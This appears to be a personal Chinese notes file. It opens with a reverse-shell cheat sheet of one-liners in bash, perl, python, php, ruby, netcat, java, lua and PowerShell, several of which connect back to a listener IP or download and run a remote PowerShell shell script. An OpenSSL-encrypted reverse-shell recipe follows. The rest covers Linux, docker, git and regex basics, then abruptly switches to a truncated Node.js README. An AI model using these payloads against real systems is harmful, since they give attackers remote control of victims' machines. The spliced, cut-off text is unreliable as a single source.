bash -i >& /dev/tcp/172.16.1.130/4444 0>&1
```
```bash
exec 5<>/dev/tcp/172.16.1.130/4444;cat <&5|while read line;do $line >&5 2>&1;done
```
## perl
```
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```
## python
```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.31.41",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```
## php
```
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
```
## ruby
```
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
```
## nc
```
nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
nc x.x.x.x 8888|/bin/sh|nc x.x.x.x 9999
```
## java
```
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
```
## lua
```
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
```
## powershell
```
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 172.16.1.130 -port 4444
```
## OpenSsl加密隧道反弹
https://mp.weixin.qq.com/s/-3uWqvn_sKH6zHYqdVTwuw
1、首先生成自签名证书,输入的时候默认回车即可:
```
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
```
2、服务端监听8888端口:
```
openssl s_server -quiet -key key.pem -cert cert.pem -port 8888
```
3、Linux下使用mkfifo进行反弹shell:
```
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect Your ip:Your port> /tmp/s; rm /tmp/s
```
推荐linux使用
# linux命令笔记
## 基础常用命令
- `某个命令 --h`,对这个命令进行解释
- `某个命令 --help`,解释这个命令(更详细)
- `man某个命令`,文档式解释这个命令(更更详细)(执行该命令后,还可以按/+关键字进行查询结果的搜索)
- `Ctrl + c`,结束命令
- `TAB键`,自动补全命令(按一次自动补全,连续按两次,提示所有以输入开头字母的所有命令)
- `键盘上下键`,输入临近的历史命令
- `history`,查看所有的历史命令
- `Ctrl + r`,进入历史命令的搜索功能模式
- `clear`,清除屏幕里面的所有命令
- `pwd`,显示当前目录路径(常用)
- `firefox&`,最后后面的 **&** 符号,表示使用后台方式打开 Firefox,然后显示该进程的 PID 值
- `jobs`,查看后台运行的程序列表
- `ifconfig`,查看内网 IP 等信息(常用)
- `curl ifconfig.me`,查看外网 IP 信息
- `curl ip.cn`,查看外网 IP 信息
- ```
locate 搜索关键字
```
,快速搜索系统文件/文件夹(类似 Windows 上的 everything 索引式搜索)(常用)
- `updatedb`,配合上面的 locate,给 locate 的索引更新(locate 默认是一天更新一次索引)(常用)
- ```
date
```
,查看系统时间(常用)
- `date -s20080103`,设置日期(常用)
- `date -s18:24`,设置时间,如果要同时更改 BIOS 时间,再执行 `hwclock --systohc`(常用)
- `cal`,在终端中查看日历,肯定没有农历显示的
- `uptime`,查看系统已经运行了多久,当前有几个用户等信息(常用)
- `cat 文件路名`,显示文件内容(属于打印语句)
- `cat -n 文件名`,显示文件,并每一行内容都编号
- `more 文件名`,用分页的方式查看文件内容(按 space 翻下一页,按 *Ctrl + B* 返回上页)
- ```
less
```
文件名,用分页的方式查看文件内容(带上下翻页)
- 按 **j** 向下移动,按 **k** 向上移动
- 按 **/** 后,输入要查找的字符串内容,可以对文件进行向下查询,如果存在多个结果可以按 **n** 调到下一个结果出
- 按 **?** 后,输入要查找的字符串内容,可以对文件进行向上查询,如果存在多个结果可以按 **n** 调到下一个结果出
- ```
shutdown
```
- `shutdown -hnow`,立即关机
- `shutdown -h+10`,10 分钟后关机
- `shutdown -h23:30`,23:30 关机
- `shutdown -rnew`,立即重启
- `poweroff`,立即关机(常用)
- `reboot`,立即重启(常用)
- ```
zip mytest.zip /opt/test/
```
,把 /opt 目录下的 test/ 目录进行压缩,压缩成一个名叫 mytest 的 zip 文件
- `unzip mytest.zip`,对 mytest.zip 这个文件进行解压,解压到当前所在目录
- `unzip mytest.zip -d /opt/setups/`,对 mytest.zip 这个文件进行解压,解压到 /opt/setups/ 目录下
- `tar -cvf mytest.tar mytest/`,对 mytest/ 目录进行归档处理(归档和压缩不一样)
- ```
tar -xvf mytest.tar
```
,释放 mytest.tar 这个归档文件,释放到当前目录
- `tar -xvf mytest.tar -C /opt/setups/`,释放 mytest.tar 这个归档文件,释放到 /opt/setups/ 目录下
- `last`,显示最近登录的帐户及时间
- `lastlog`,显示系统所有用户各自在最近登录的记录,如果没有登录过的用户会显示 **从未登陆过**
- ```
ls
```
,列出当前目录下的所有没有隐藏的文件 / 文件夹。
- `ls -a`,列出包括以.号开头的隐藏文件 / 文件夹(也就是所有文件)
- `ls -R`,显示出目录下以及其所有子目录的文件 / 文件夹(递归地方式,不显示隐藏的文件)
- `ls -a -R`,显示出目录下以及其所有子目录的文件 / 文件夹(递归地方式,显示隐藏的文件)
- `ls -al`,列出目录下所有文件(包含隐藏)的权限、所有者、文件大小、修改时间及名称(也就是显示详细信息)
- `ls -ld 目录名`,显示该目录的基本信息
- `ls -t`,依照文件最后修改时间的顺序列出文件名。
- `ls -F`,列出当前目录下的文件名及其类型。以 **/** 结尾表示为目录名,以 ***** 结尾表示为可执行文件,以 **@** 结尾表示为符号连接
- `ls -lg`,同上,并显示出文件的所有者工作组名。
- `ls -lh`,查看文件夹类文件详细信息,文件大小,文件修改时间
- `ls /opt | head -5`,显示 opt 目录下前 5 条记录
- `ls -l | grep '.jar'`,查找当前目录下所有 jar 文件
- `ls -l /opt |grep "^-"|wc -l`,统计 opt 目录下文件的个数,不会递归统计
- `ls -lR /opt |grep "^-"|wc -l`,统计 opt 目录下文件的个数,会递归统计
- `ls -l /opt |grep "^d"|wc -l`,统计 opt 目录下目录的个数,不会递归统计
- `ls -lR /opt |grep "^d"|wc -l`,统计 opt 目录下目录的个数,会递归统计
- `ls -lR /opt |grep "js"|wc -l`,统计 opt 目录下 js 文件的个数,会递归统计
- `ls -l`,列出目录下所有文件的权限、所有者、文件大小、修改时间及名称(也就是显示详细信息,不显示隐藏文件)。显示出来的效果如下:
```
-rwxr-xr-x. 1 root root 4096 3月 26 10:57,其中最前面的 - 表示这是一个普通文件
lrwxrwxrwx. 1 root root 4096 3月 26 10:57,其中最前面的 l 表示这是一个链接文件,类似 Windows 的快捷方式
drwxr-xr-x. 5 root root 4096 3月 26 10:57,其中最前面的 d 表示这是一个目录
```
- ```
cd
```
,目录切换
- `cd ..`,改变目录位置至当前目录的父目录(上级目录)。
- `cd ~`,改变目录位置至用户登录时的工作目录。
- `cd 回车`,回到家目录
- `cd -`,上一个工作目录
- `cd dir1/`,改变目录位置至 dir1 目录下。
- `cd ~user`,改变目录位置至用户的工作目录。
- `cd ../user`,改变目录位置至相对路径user的目录下。
- `cd /../..`,改变目录位置至绝对路径的目录位置下。
- ```
cp 源文件 目标文件
```
,复制文件
- `cp -r 源文件夹 目标文件夹`,复制文件夹
- `cp -r -v 源文件夹 目标文件夹`,复制文件夹(显示详细信息,一般用于文件夹很大,需要查看复制进度的时候)
- `cp /usr/share/easy-rsa/2.0/keys/{ca.crt,server.{crt,key},dh2048.pem,ta.key} /etc/openvpn/keys/`,复制同目录下花括号中的文件
- `tar cpf - . | tar xpf - -C /opt`,复制当前所有文件到 /opt 目录下,一般如果文件夹文件多的情况下用这个更好,用 cp 比较容易出问题
- ```
mv 文件 目标文件夹
```
,移动文件到目标文件夹
- `mv 文件`,不指定目录重命名后的名字,用来重命名文件
- `touch 文件名`,创建一个空白文件/更新已有文件的时间(后者少用)
- `mkdir 文件夹名`,创建文件夹
- `mkdir -p /opt/setups/nginx/conf/`,创建一个名为 conf 文件夹,如果它的上级目录 nginx 没有也会跟着一起生成,如果有则跳过
- `rmdir 文件夹名`,删除文件夹(只能删除文件夹里面是没有东西的文件夹)
- ```
rm 文件
```
,删除文件
- `rm -r 文件夹`,删除文件夹
- `rm -r -i 文件夹`,在删除文件夹里的文件会提示(要的话,在提示后面输入yes)
- `rm -r -f 文件夹`,强制删除
- `rm -r -f 文件夹1/ 文件夹2/ 文件夹3/`删除多个
- ```
find
```
,高级查找
- `find . -name *lin*`,其中 . 代表在当前目录找,-name 表示匹配文件名 / 文件夹名,*lin* 用通配符搜索含有lin的文件或是文件夹
- `find . -iname *lin*`,其中 . 代表在当前目录找,-iname 表示匹配文件名 / 文件夹名(忽略大小写差异),*lin* 用通配符搜索含有lin的文件或是文件夹
- `find / -name *.conf`,其中 / 代表根目录查找,*.conf代表搜索后缀会.conf的文件
- `find /opt -name .oh-my-zsh`,其中 /opt 代表目录名,.oh-my-zsh 代表搜索的是隐藏文件 / 文件夹名字为 oh-my-zsh 的
- `find /opt -type f -iname .oh-my-zsh`,其中 /opt 代表目录名,-type f 代表只找文件,.oh-my-zsh 代表搜索的是隐藏文件名字为 oh-my-zsh 的
- `find /opt -type d -iname .oh-my-zsh`,其中 /opt 代表目录名,-type d 代表只找目录,.oh-my-zsh 代表搜索的是隐藏文件夹名字为 oh-my-zsh 的
- `find . -name "lin*" -exec ls -l {} \;`,当前目录搜索lin开头的文件,然后用其搜索后的结果集,再执行ls -l的命令(这个命令可变,其他命令也可以),其中 -exec 和 {} ; 都是固定格式
- `find /opt -type f -size +800M -print0 | xargs -0 du -h | sort -nr`,找出 /opt 目录下大于 800 M 的文件
- `find / -name "*tower*" -exec rm {} \;`,找到文件并删除
- `find / -name "*tower*" -exec mv {} /opt \;`,找到文件并移到 opt 目录
- `find . -name "*" |xargs grep "youmeek"`,递归查找当前文件夹下所有文件内容中包含 youmeek 的文件
- `find . -size 0 | xargs rm -f &`,删除当前目录下文件大小为0的文件
- `du -hm --max-depth=2 | sort -nr | head -12`,找出系统中占用容量最大的前 12 个目录
- `cat /etc/resolv.conf`,查看 DNS 设置
- `netstat -tlunp`,查看当前运行的服务,同时可以查看到:运行的程序已使用端口情况
- `env`,查看所有系统变量
- `export`,查看所有系统变量
- ```
echo
```
- `echo $JAVA_HOME`,查看指定系统变量的值,这里查看的是自己配置的 JAVA_HOME。
- `echo "字符串内容"`,输出 "字符串内容"
- `echo > aa.txt`,清空 aa.txt 文件内容(类似的还有:`: > aa.txt`,其中 : 是一个占位符, 不产生任何输出)
- `unset $JAVA_HOME`,删除指定的环境变量
- `ln -s /opt/data /opt/logs/data`,表示给 /opt/logs 目录下创建一个名为 data 的软链接,该软链接指向到 /opt/data
- ```
grep
```
- `shell grep -H '安装' *.sh`,查找当前目录下所有 sh 类型文件中,文件内容包含 `安装` 的当前行内容
- `grep 'test' java*`,显示当前目录下所有以 java 开头的文件中包含 test 的行
- `grep 'test' spring.ini docker.sh`,显示当前目录下 spring.ini docker.sh 两个文件中匹配 test 的行
- ```
ps
```
- `ps –ef|grep java`,查看当前系统中有关 java 的所有进程
- `ps -ef|grep --color java`,高亮显示当前系统中有关 java 的所有进程
- ```
kill
```
- `kill 1234`,结束 pid 为 1234 的进程
- `kill -9 1234`,强制结束 pid 为 1234 的进程(慎重)
- `killall java`,结束同一进程组内的所有为 java 进程
- `ps -ef|grep hadoop|grep -v grep|cut -c 9-15|xargs kill -9`,结束包含关键字 hadoop 的所有进程
- ```
head
```
- `head -n 10 spring.ini`,查看当前文件的前 10 行内容
- ```
tail
```
- `tail -n 10 spring.ini`,查看当前文件的后 10 行内容
- `tail -200f 文件名`,查看文件被更新的新内容尾 200 行,如果文件还有在新增可以动态查看到(一般用于查看日记文件)
## 用户、权限-相关命令
- 使用 pem 证书登录:
```
ssh -i /opt/mykey.pem root@192.168.0.70
```
- 证书权限不能太大,不然无法使用:`chmod 600 mykey.pem`
- `hostname`,查看当前登陆用户全名
- `cat /etc/group`,查看所有组
- `cat /etc/passwd`,查看所有用户
- `groups youmeek`,查看 youmeek 用户属于哪个组
- `useradd youmeek -g judasn`,添加用户并绑定到 judasn 组下
- ```
userdel -r youmeek
```
,删除名字为 youmeek 的用户
- 参数:`-r`,表示删除用户的时候连同用户的家目录一起删除
- 修改普通用户 youmeek 的权限跟 root 权限一样:
- 常用方法(原理是把该用户加到可以直接使用 sudo 的一个权限状态而已):
- 编辑配置文件:`vim /etc/sudoers`
- 找到 98 行(预估),有一个:`root ALL=(ALL) ALL`,在这一行下面再增加一行,效果如下:
```
root ALL=(ALL) ALL
youmeek ALL=(ALL) ALL
```
- 另一种方法:
- 编辑系统用户的配置文件:`vim /etc/passwd`,找到 **root** 和 **youmeek** 各自开头的那一行,比如 root 是:`root:x:0:0:root:/root:/bin/zsh`,这个代表的含义为:*用户名:密码:UserId:GroupId:描述:家目录:登录使用的 shell*
- 通过这两行对比,我们可以直接修改 youmeek 所在行的 UserId 值 和 GroupId 值,都改为 0。
- `groupadd judasn`,添加一个名为 judasn 的用户组
- `groupdel judasn`,删除一个名为 judasn 的用户组(前提:先删除组下面的所有用户)
- `usermod 用户名 -g 组名`,把用户修改到其他组下
- `passwd youmeek`,修改 youmeek 用户的密码(前提:只有 root 用户才有修改其他用户的权限,其他用户只能修改自己的)
- ```
chmod 777 文件名/目录
```
,给指定文件增加最高权限,系统中的所有人都可以进行读写。
- linux 的权限分为 rwx。r 代表:可读,w 代表:可写,x 代表:可执行
- 这三个权限都可以转换成数值表示,r = 4,w = 2,x = 1,- = 0,所以总和是 7,也就是最大权限。第一个 7 是所属主(user)的权限,第二个 7 是所属组(group)的权限,最后一位 7 是非本群组用户(others)的权限。
- `chmod -R 777 目录` 表示递归目录下的所有文件夹,都赋予 777 权限
- `chown myUsername:myGroupName myFile` 表示修改文件所属用户、组
- `chown -R myUsername:myGroupName myFolder` 表示递归修改指定目录下的所有文件权限
- ```
su
```
:切换到 root 用户,终端目录还是原来的地方(常用)
- `su -`:切换到 root 用户,其中 **-** 号另起一个终端并切换账号
- `su 用户名`,切换指定用户帐号登陆,终端目录还是原来地方。
- `su - 用户名`,切换到指定用户帐号登陆,其中 **-** 号另起一个终端并切换账号
- `exit`,注销当前用户(常用)
- `sudo 某个命令`,使用管理员权限使用命令,使用 sudo 回车之后需要输入当前登录账号的密码。(常用)
- `passwd`,修改当前用户密码(常用)
- 添加临时账号,并指定用户根目录,并只有可读权限方法
- 添加账号并指定根目录(用户名 tempuser):`useradd -d /data/logs -m tempuser`
- 设置密码:`passwd tempuser` 回车设置密码
- 删除用户(该用户必须退出 SSH 才能删除成功),也会同时删除组:`userdel tempuser`
## 磁盘管理
- ```
df -h
```
,自动以合适的磁盘容量单位查看磁盘大小和使用空间
- `df -k`,以磁盘容量单位 K 为数值结果查看磁盘使用情况
- `df -m`,以磁盘容量单位 M 为数值结果查看磁盘使用情况
- `du -sh /opt`,查看 opt 这个文件夹大小 (h 的意思 human-readable 用人类可读性较好方式显示,系统会自动调节单位,显示合适大小的单位)
- `du -sh ./*`,查看当前目录下所有文件夹大小 (h 的意思 human-readable 用人类可读性较好方式显示,系统会自动调节单位,显示合适大小的单位)
- `du -sh /opt/setups/`,显示 /opt/setups/ 目录所占硬盘空间大小(s 表示 –summarize 仅显示总计,即当前目录的大小。h 表示 –human-readable 以 KB,MB,GB 为单位,提高信息的可读性)
- ```
mount /dev/sdb5 /newDir/
```
,把分区 sdb5 挂载在根目录下的一个名为 newDir 的空目录下,需要注意的是:这个目录最好为空,不然已有的那些文件将看不到,除非卸载挂载。
- 挂载好之后,通过:`df -h`,查看挂载情况。
- ```
umount /newDir/
```
,卸载挂载,用目录名
- 如果这样卸载不了可以使用:`umount -l /newDir/`
- `umount /dev/sdb5`,卸载挂载,用分区名
## wget 下载文件
- 常规下载:`wget http://www.gitnavi.com/index.html`
- 自动断点下载:`wget -c http://www.gitnavi.com/index.html`
- 后台下载:`wget -b http://www.gitnavi.com/index.html`
- 伪装代理名称下载:`wget --user-agent="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16" http://www.gitnavi.com/index.html`
- 限速下载:`wget --limit-rate=300k http://www.gitnavi.com/index.html`
- 批量下载:`wget -i /opt/download.txt`,一个下载地址一行
- 后台批量下载:`wget -b -c -i /opt/download.txt`,一个下载地址一行
## 其他常用命令
- 编辑 hosts 文件:`vim /etc/hosts`,添加内容格式:`127.0.0.1 www.youmeek.com`
- RPM 文件操作命令:
- 安装
- `rpm -i example.rpm`,安装 example.rpm 包
- `rpm -iv example.rpm`,安装 example.rpm 包并在安装过程中显示正在安装的文件信息
- `rpm -ivh example.rpm`,安装 example.rpm 包并在安装过程中显示正在安装的文件信息及安装进度
- 查询
- `rpm -qa | grep jdk`,查看 jdk 是否被安装
- `rpm -ql jdk`,查看 jdk 是否被安装
- 卸载
- `rpm -e jdk`,卸载 jdk(一般卸载的时候都要先用 rpm -qa 看下整个软件的全名)
- YUM 软件管理:
- `yum install -y httpd`,安装 apache
- `yum remove -y httpd`,卸载 apache
- `yum info -y httpd`,查看 apache 版本信息
- `yum list --showduplicates httpd`,查看可以安装的版本
- `yum install httpd-查询到的版本号`,安装指定版本
- 更多命令可以看:http://man.linuxde.net/yum
- 查看某个配置文件,排除掉里面以 # 开头的注释内容:
- `grep '^[^#]' /etc/openvpn/server.conf`
- 查看某个配置文件,排除掉里面以 # 开头和 ; 开头的注释内容:
- `grep '^[^#;]' /etc/openvpn/server.conf`
## AWK命令
`awk '{ print }' /etc/passwd`
查看/etc/passwd内容和用cat命令一样.指定了/etc/passwd 作为输入文件。执行 awk 时,它依次对 /etc/passwd 中的每一行执行 print 命令
`awk '{ print $0 }' /etc/passwd`
在 awk 中, $0 变量表示整个当前行,所以 print 和 print $0 的作用完全一样.
`awk -F":" '{ print $1 }' /etc/passwd`
使用 -F 选项来指定 ":" 作为字段分隔符。awk 处理 print $1 命令时,它会打印出在输入文件中每一行中出现的第一个字段(第一列)。
`awk -F":" '{ print $1 $3 }' /etc/passwd`
打印第一列和第三列
`awk -F":" '{ print $1 " " $3 }' /etc/passwd`
打印第一列和第三列,用空格分开
awk -F":" '{ print "username: " $1 "/t/tuid:" $3" }' /etc/passwd
拼接一些字符串
待更新
## shell编程
**拼接字符串**
```bash
yourname="lihua"
chat="Hello, "$yourname" !"
chat1="Hello, ${yourname} !"
echo ${chat} ${chat1}
```
**if语句**
语法格式
```bash
if condition
then
command1
fi
```
```bash
if condition
then
command1
else
command1
fi
```
```bash
if condition1
then
command1
elif condition2
then
command1
else
commandm
fi
```
文件表达式
-e filename 如果 filename存在,则为真
-d filename 如果 filename为目录,则为真
-f filename 如果 filename为常规文件,则为真
-L filename 如果 filename为符号链接,则为真
-r filename 如果 filename可读,则为真
-w filename 如果 filename可写,则为真
-x filename 如果 filename可执行,则为真
-s filename 如果文件长度不为0,则为真
-h filename 如果文件是软链接,则为真
filename1 -nt filename2 如果 filename1比 filename2新,则为真。
filename1 -ot filename2 如果 filename1比 filename2旧,则为真。
整数变量表达式
-eq 等于
-ne 不等于
-gt 大于
-ge 大于等于
-lt 小于
-le 小于等于
字符串变量表达式
If [ $a = $b ] 如果string1等于string2,则为真
字符串允许使用赋值号做等号
if [ $string1 != $string2 ] 如果string1不等于string2,则为真
if [ -n $string ] 如果string 非空(非0),返回0(true)
if [ -z $string ] 如果string 为空,则为真
if [ $sting ] 如果string 非空,返回0 (和-n类似)
逻辑非 ! 条件表达式的相反
if [ ! 表达式 ]
if [ ! -d $num ] 如果不存在目录$num
逻辑与 –a 条件表达式的并列
if [ 表达式1 –a 表达式2 ]
逻辑或 -o 条件表达式的或
if [ 表达式1 –o 表达式2 ]
**for循环**
```
for var in item1
do
command1
command2
Done
```
while
```
while condition
do
command
done
```
# docker命令笔记
搜索镜像
```
sudo docker search metasploit
```
拉取(下载)镜像
```
sudo docker pull metasploitframework/metasploit-framework
```
查看全部镜像
```
sudo docker images
```
简单运行镜像
```
sudo docker run metasploitframework/metasploit-framework
```
用id运行
```
sudo docker run 644b96152120
```
交互运行镜像
```
sudo docker run -dit --name msf metasploitframework/metasploit-framework
```
-dit 同等于 -d -i -t
-i: 以交互模式运行容器,通常与 -t 同时使用;
-d: 后台运行容器,并返回容器ID;
-t: 为容器重新分配一个伪输入终端,通常与 -i 同时使用;
--name="msf": 为容器指定一个名称,方面后面直接用名称启动;
进入容器终端(进入已经在运行的镜像)
```
sudo docker exec -it msf /bin/bash
```
端口映射,运行镜像(容器80到主机5000)
```
sudo docker run -dit -p 5000:80 --name nginx nginx:latest
```
查看容器的端口映射
```
sudo docker port nginx
```
启动容器(运行过镜像就会出现一个容器,比如电脑重启就需要重新启动容器,不需要在重新run一个)
```
sudo docker start nginx
```
停止容器
```
sudo docker stop nginx
```
重启容器
```
sudo docker restart nginx
```
查看当前正在运行的容器
```
sudo docker ps
```
查看全部,包括已经停止的
```
docker ps -a
```
删除容器
```
sudo docker rm 容器id
```
强制删除
```
sudo docker rm -f 容器id
```
删除镜像
```
sudo docker rmi 镜像id
```
查看网络
```
sudo docker network ls
```
# ubuntu踩坑记录
- unzip 命令解压windows下的压缩包乱码,可用unar命令解决
```bash
sudo apt install unar
unar xxx.zip #不需要加参数,自动识别编码
```
-
# git 笔记
## 当前项目(仓库)记住密码
1根目录输入:
加--global可以设置全局记住
```
git config credential.helper store
```
2然后打开.git文件夹的config文件,回发现多了两行
```
[credential]
helper=store
```
3后面只需要pull提交一次就会记住密码
# 编程语言学习笔记
## 常用正则
**邮箱**
`gaozihang-001@gmail.com` 只允许英文字母、数字、下划线、英文句号、以及中划线组成
```
^[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+(\.[a-zA-Z0-9_-]+)+$
```
`高子航001Abc@bowbee.com.cn` 名称允许汉字、字母、数字,域名只允许英文域名
```
^[A-Za-z0-9\u4e00-\u9fa5]+@[a-zA-Z0-9_-]+(\.[a-zA-Z0-9_-]+)+$
```
**电话**
`13012345678` 手机号
```
^1(3|4|5|6|7|8|9)\d{9}$
```
`XXX-XXXXXXX` `XXXX-XXXXXXXX` 固定电话
```
(\(\d{3,4}\)|\d{3,4}-|\s)?\d{8}
```
**域名**
https://google.com/
```
^((http:\/\/)|(https:\/\/))?([a-zA-Z0-9]([a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?\.)+[a-zA-Z]{2,6}(\/)
```
**IP**
127.0.0.1
```
((?:(?:25[0-5]|2[0-4]\d|[01]?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|[01]?\d?\d))
```
**帐号校验**
gaozihang_001 字母开头,允许5-16字节,允许字母数字下划线
```
^[a-zA-Z][a-zA-Z0-9_]{4,15}$
```
字符校验
汉字
高子航
```
^[\u4e00-\u9fa5]{0,}$
```
英文和数字
```
^[A-Za-z0-9]+$
```
长度为3-20的所有字符
```
^.{3,20}$
```
英文字符
由26个英文字母组成的字符串
```
^[A-Za-z]+$
```
由26个大写英文字母组成的字符串
```
^[A-Z]+$
```
由26个小写英文字母组成的字符串
```
^[a-z]+$
```
由数字和26个英文字母组成的字符串
```
^[A-Za-z0-9]+$
```
由数字、26个英文字母或者下划线组成的字符串
```
^\w+$
```
中文、英文、数字包括下划线
```
^[\u4E00-\u9FA5A-Za-z0-9_]+$
```
中文、英文、数字但不包括下划线等符号
```
^[\u4E00-\u9FA5A-Za-z0-9]+$
```
禁止输入含有%&',;=?$"等字符
```
[^%&',;=?$\x22]+
```
禁止输入含有~的字符
```
[^~\x22]+
```
数字正则
整数
```
^-?[1-9]\d*$
```
正整数
```
^[1-9]\d*$
```
负整数
```
^-[1-9]\d*$
```
非负整数
```
^[1-9]\d*|0$
```
非正整数
```
^-[1-9]\d*|0$
```
浮点数
```
^-?([1-9]\d*\.\d*|0\.\d*[1-9]\d*|0?\.0+|0)$
```
正浮点数
```
^[1-9]\d*\.\d*|0\.\d*[1-9]\d*$
```
负浮点数
```
^-([1-9]\d*\.\d*|0\.\d*[1-9]\d*)$
```
非负浮点数
```
^[1-9]\d*\.\d*|0\.\d*[1-9]\d*|0?\.0+|0$
```
非正浮点数
```
^(-([1-9]\d*\.\d*|0\.\d*[1-9]\d*))|0?\.0+|0$
```
## php
# 读书笔记
# 漏洞笔记
xss入门https://wizardforcel.gitbooks.io/xss-naxienian/content/1.html
|
# Node.js
Node.js is an open-source, cross-platform JavaScript runtime environment.
For information on using Node.js, see the [Node.js website][].
The Node.js project uses an [open governance model](./GOVERNANCE.md). The
[OpenJS Foundation][] provides support for the project.
Contributors are expected to act in a collaborative manner to move
the project forward. We encourage the constructive exchange of contrary
opinions and compromise. The [TSC](./GOVERNANCE.md#technical-steering-committee)
reserves the right to limit or block contributors who repeatedly act in ways
that discourage, exhaust, or otherwise negatively affect other participants.
**This project has a [Code of Conduct][].**
## Table of contents
* [Support](#support)
* [Release types](#release-types)
* [Download](#download)
* [Current and LTS releases](#current-and-lts-releases)
* [Nightly releases](#nightly-releases)
* [API documentation](#api-documentation)
* [Verifying binaries](#verifying-binaries)
* [Building Node.js](#building-nodejs)
* [Security](#security)
* [Contributing to Node.js](#contributing-to-nodejs)
* [Current project team members](#current-project-team-members)
* [TSC (Technical Steering Committee)](#tsc-technical-steering-committee)
* [Collaborators](#collaborators)
* [Triagers](#triagers)
* [Release keys](#release-keys)
* [License](#license)
## Support
Looking for help? Check out the
[instructions for getting support](.github/SUPPORT.md).
## Release types
* **Current**: Under active development. Code for the Current release is in the
branch for its major version number (for example,
[v19.x](https://github.com/nodejs/node/tree/v19.x)). Node.js releases a new
major version every 6 months, allowing for breaking changes. This happens in
April and October every year. Releases appearing each October have a support
life of 8 months. Releases appearing each April convert to LTS (see below)
each October.
* **LTS**: Releases that receive Long Term Support, with a focus on stability
and security. Every even-numbered major version will become an LTS release.
LTS releases receive 12 months of _Active LTS_ support and a further 18 months
of _Maintenance_. LTS release lines have alphabetically-ordered code names,
beginning with v4 Argon. There are no breaking changes or feature additions,
except in some special circumstances.
* **Nightly**: Code from the Current branch built every 24-hours when there are
changes. Use with caution.
Current and LTS releases follow [semantic versioning](https://semver.org). A
member of the Release Team [signs](#release-keys) each Current and LTS release.
For more information, see the
[Release README](https://github.com/nodejs/Release#readme).
### Download
Binaries, installers, and source tarballs are available at
<https://nodejs.org/en/download/>.
#### Current and LTS releases
<https://nodejs.org/download/release/>
The [latest](https://nodejs.org/download/release/latest/) directory is an
alias for the latest Current release. The latest-_codename_ directory is an
alias for the latest release from an LTS line. For example, the
[latest-hydrogen](https://nodejs.org/download/release/latest-hydrogen/)
directory contains the latest Hydrogen (Node.js 18) release.
#### Nightly releases
<https://nodejs.org/download/nightly/>
Each directory name and filename contains a date (in UTC) and the commit
SHA at the HEAD of the release.
#### API documentation
Documentation for the latest Current release is at <https://nodejs.org/api/>.
Version-specific documentation is available in each release directory in the
_docs_ subdirectory. Version-specific documentation is also at
<https://nodejs.org/download/docs/>.
### Verifying binaries
Download directories contain a `SHASUMS256.txt` file with SHA checksums for the
files.
To download `SHASUMS256.txt` using `curl`:
```bash
curl -O https://nodejs.org/dist/vx.y.z/SHASUMS256.txt
```
To check that a downloaded file matches the checksum, run
it through `sha256sum` with a command such as:
```bash
grep node-vx.y.z.tar.gz SHASUMS256.txt | sha256sum -c -
```
For Current and LTS, the GPG detached signature of `SHASUMS256.txt` is in
`SHASUMS256.txt.sig`. You can use it with `gpg` to verify the integrity of
`SHASUMS256.txt`. You will first need to import
[the GPG keys of individuals authorized to create releases](#release-keys). To
import the keys:
```bash
gpg --keyserver hkps://keys.openpgp.org --recv-keys 4ED778F539E3634C779C87C6D7062848A1AB005C
```
See [Release keys](#release-keys) for a script to import active release keys.
Next, download the `SHASUMS256.txt.sig` for the release:
```bash
curl -O https://nodejs.org/dist/vx.y.z/SHASUMS256.txt.sig
```
Then use `gpg --verify SHASUMS256.txt.sig SHASUMS256.txt` to verify
the file's signature.
## Building Node.js
See [BUILDING.md](BUILDING.md) for instructions on how to build Node.js from
source and a list of supported platforms.
## Security
For information on reporting security vulnerabilities in Node.js, see
[SECURITY.md](./SECURITY.md).
## Contributing to Node.js
* [Contributing to the project][]
* [Working Groups][]
* [Strategic initiatives][]
* [Technical values and prioritization][]
## Current project team members
For information about the governance of the Node.js project, see
[GOVERNANCE.md](./GOVERNANCE.md).
<!-- node-core-utils and find-inactive-tsc.mjs depend on the format of the TSC
list. If the format changes, those utilities need to be tested and
updated. -->
### TSC (Technical Steering Committee)
#### TSC voting members
<!--lint disable prohibited-strings-->
* [aduh95](https://github.com/aduh95) -
**Antoine du Hamel** <<duhamelantoine1995@gmail.com>> (he/him)
* [apapirovski](https://github.com/apapirovski) -
**Anatoli Papirovski** <<apapirovski@mac.com>> (he/him)
* [BridgeAR](https://github.com/BridgeAR) -
**Ruben Bridgewater** <<ruben@bridgewater.de>> (he/him)
* [cjihrig](https://github.com/cjihrig) -
**Colin Ihrig** <<cjihrig@gmail.com>> (he/him)
* [danielleadams](https://github.com/danielleadams) -
**Danielle Adams** <<adamzdanielle@gmail.com>> (she/her)
* [GeoffreyBooth](https://github.com/geoffreybooth) -
